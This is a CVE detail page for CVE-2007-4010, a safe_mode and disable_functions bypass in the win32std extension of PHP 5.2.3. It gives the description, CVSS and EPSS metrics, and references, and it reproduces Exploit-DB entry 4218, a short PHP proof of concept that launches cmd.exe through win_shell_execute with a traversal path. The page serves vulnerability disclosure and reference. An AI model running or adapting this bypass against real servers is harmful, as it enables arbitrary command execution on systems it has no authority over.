CVE-2007-4010 : Detail

4.25%V3
Network
2007-07-25
22h00 +00:00
2017-09-28
10h57 +00:00

CVE Descriptions

The win32std extension in PHP 5.2.3 does not follow safe_mode and disable_functions restrictions, which allows remote attackers to execute arbitrary commands via the win_shell_execute function.

CVE Information

Metrics

| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | | AV:N/AC:M/Au:N/C:P/I:P/A:P | [email protected] |

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore used to compare the EPSS score of one CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 4218

Publication date : 2007-07-23 22h00 +00:00
Author : shinnai
EDB Verified : Yes

<?php
//PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org

//Tested on xp Pro sp2 full patched, worked both from the cli and on apache

//Thanks to rgod for all his precious advises :)

//I set php.ini in this way:
//safe_mode = On
//disable_functions = system
//if you launch the exploit from the cli, cmd.exe will be executed
//if you browse it through apache, you'll see a new cmd.exe process activated in taskmanager

if (!extension_loaded("win32std")) die("win32std extension required!");

system("cmd.exe"); //just to be sure that protections work well
win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe");
?>

# milw0rm.com [2007-07-24]

Products Mentioned

Configuration 0

Php >> Php >> Version 5.2.3

References

http://www.securityfocus.com/bid/25041
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/4218
Tags : exploit, x_refsource_EXPLOIT-DB